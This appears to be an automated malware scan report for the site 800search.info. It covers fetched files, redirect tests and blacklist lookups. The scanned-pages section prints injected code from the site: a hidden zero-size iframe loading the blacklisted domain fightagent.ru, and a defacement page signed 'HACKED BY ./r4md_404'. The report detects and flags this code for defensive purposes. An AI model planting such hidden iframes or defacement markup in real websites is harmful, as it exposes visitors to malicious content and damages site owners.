Scanned pages/files
Request | Server response | Status |
http://800search.info/ | 200 OK Content-Length: 6178 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: fightagent.ru ...[4155 bytes skipped]... -1px -1px rgba(0, 0, 0, .88), 0px 0px 20px #A4A4A4;/*color de la luz del texto*/ } .luz{ font-size:20px;/*tamaño de la fuente*/ color: #A4A4A4; text-shadow: 1px 1px rgba(255, 255, 255, .1), -1px -1px rgba(0, 0, 0, .88); } a:link { text-decoration:none; } </style><iframe width=0px height=0px frameborder=no name=frame1 src=http://fightagent.ru> </iframe> Malicious iFrame found. size: 0x0 src: http://fightagent.ru This URL is marked by Google as suspicious <iframe width=0px height=0px frameborder=no name=frame1 src=http://fightagent.ru> Deface/Content modification. The following signature was found: HACKED BY ./r4md_404 <!DOCTYPE html>
<title>HACKED BY ./r4md_404</title> <body background="http://transporteszeus.com/js/8bcddb025c198469b967c7451ba80e1d.jpg.png" oncontextmenu="return false" onkeydown="return false"><!-- BEGIN AV_TOOLBAR --> <script type="text/javascript"> (function(d, s) { var fjs = d.getElementsByTagName(s)[0], js = d.createElement(s); js.src = "//tb.altervista.org/js/script.js?1"; ...[6628 bytes skipped]... | ||
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js | 200 OK Content-Length: 72174 Content-Type: text/javascript | clean |
http://jqueryrotate.googlecode.com/svn/trunk/jQueryRotate.js | 200 OK Content-Length: 13892 Content-Type: text/plain | clean |
http://jqueryrotate.googlecode.com/test404page.js | 404 Not Found Content-Length: 1439 Content-Type: text/html | clean |
http://jqueryrotate.googlecode.com//www.google.com/ | 404 Not Found Content-Length: 1425 Content-Type: text/html | clean |
http://www.p0wersurge.com/js/jquery-css-transform.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://www.p0wersurge.com/js/rotate3Di.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 800search.info
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 Mar 2015 08:35:11 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
GET / HTTP/1.1
Host: 800search.info
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 Mar 2015 08:35:11 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: 800search.info
Referer: http://www.google.com/search?q=800search.info
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 800search.info
Referer: http://www.google.com/search?q=800search.info
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=800search.info
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://800search.info/
Result: 800search.info is not infected or malware details are not published yet.
Result: 800search.info is not infected or malware details are not published yet.